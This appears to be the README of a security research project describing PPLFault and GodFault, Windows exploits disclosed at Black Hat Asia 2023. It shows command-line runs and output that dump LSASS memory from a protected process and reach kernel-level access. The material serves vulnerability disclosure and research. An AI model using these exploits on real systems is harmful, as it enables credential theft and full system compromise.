By Gabriel Landau at Elastic Security.
From PPLdump Is Dead. Long Live PPLdump! presented at Black Hat Asia 2023.
2024-02 UPDATE: Microsoft patched PPLFault on 2024-02-13. See this thread for related discussion.
Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process. For more details on the exploit, see my slides and/or talk.
PS C:\Users\user\Desktop> cmd /c ver
Microsoft Windows [Version 10.0.25346.1001]
PS C:\Users\user\Desktop> tasklist | findstr lsass
lsass.exe 992 Services 0 76,620 K
PS C:\Users\user\Desktop> (Get-NtProcess -Access QueryLimitedInformation -Pid 992).Protection
Type Signer
---- ------
ProtectedLight Lsa
PS C:\Users\user\Desktop> dir *.dmp
PS C:\Users\user\Desktop> .\PPLFault.exe -v 992 lsass.dmp
[+] No cleanup necessary. Backup does not exist.
[+] GetShellcode: 528 bytes of shellcode written over DLL entrypoint
[+] Benign: C:\Windows\System32\EventAggregation.dll.bak
[+] Payload: C:\PPLFaultTemp\PPLFaultPayload.dll
[+] Placeholder: C:\PPLFaultTemp\EventAggregationPH.dll
[+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll
[+] Ready. Spawning WinTcb.
[+] SpawnPPL: Waiting for child process to finish.
[+] FetchDataCallback called.
[+] Hydrating 90112 bytes at offset 0
[+] Switching to payload
[+] Emptying system working set
[+] Working set purged
[+] Give the memory manager a moment to think
[+] Hydrating 90112 PAYLOAD bytes at offset 0
[+] Dump saved to: lsass.dmp
[+] Dump is 74.9 MB
[+] Operation took 937 ms
PS C:\Users\user\Desktop> dir *.dmp
Directory: C:\Users\user\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/1/2023 11:18 AM 78581973 lsass.dmp
Exploits the same TOCTOU as PPLFault. However instead of dumping a process, it migrates to CSRSS and exploits a vulnerability in win32k!NtUserHardErrorControlCall from ANGRYORCHARD to decrement KTHREAD.PreviousMode from UserMode (1) to KernelMode (0). It proves "God Mode" access by opening \Device\PhysicalMemory, normally inaccessible from UserMode, as SECTION_ALL_ACCESS.
C:\Users\user\Desktop>GodFault.exe -v
[?] Server does not appear to be running. Attempting to install it...
[+] No cleanup necessary. Backup does not exist.
[+] GetShellcode: 2304 bytes of shellcode written over DLL entrypoint
[+] CSRSS PID is 772
[+] Benign: C:\Windows\System32\EventAggregation.dll.bak
[+] Payload: C:\GodFaultTemp\GodFaultPayload.dll
[+] Placeholder: C:\GodFaultTemp\EventAggregationPH.dll
[+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll
[+] Testing initial ability to acquire PROCESS_ALL_ACCESS to System: Failure
[+] Ready. Spawning WinTcb.
[+] SpawnPPL: Waiting for child process to finish.
[+] FetchDataCallback called.
[+] Hydrating 90112 bytes at offset 0
[+] Switching to payload
[+] Emptying system working set
[+] Working set purged
[+] Give the memory manager a moment to think
[+] Hydrating 90112 PAYLOAD bytes at offset 0
[+] Thread 6248 (KTHREAD FFFFA283B0A62080) has been blessed
[+] Testing post-exploit ability to acquire PROCESS_ALL_ACCESS to System: Success
[+] Opened \Device\PhysicalMemory. Handle is 0x1b4
[+] Opened System process as PROCESS_ALL_ACCESS. Handle is 0x1c0
[+] Press any key to continue...
[+] No cleanup necessary. Backup does not exist.
PoC that achieves arbitrary code execution as WinTcb-Light without the CloudFilter API. See python/README.md.
| Windows 11 22H2 22621.1702 (May 2023) | Windows 11 Insider Canary 25346.1001 (April 2023) | |
|---|---|---|
| PPLFault | ✔️ | ✔️ |
| GodFault | ✔️ | ❌ Insider PreviousMode mitigation bugchecks |
PPLFault is covered by the ELv2 license. It uses phnt from SystemInformer under the MIT license.
Inspired by PPLdump by Clément Labro, which Microsoft patched in July 2022.
ANGRYORCHARD was created by Austin Hudson, who released it when Microsoft patched PPLdump.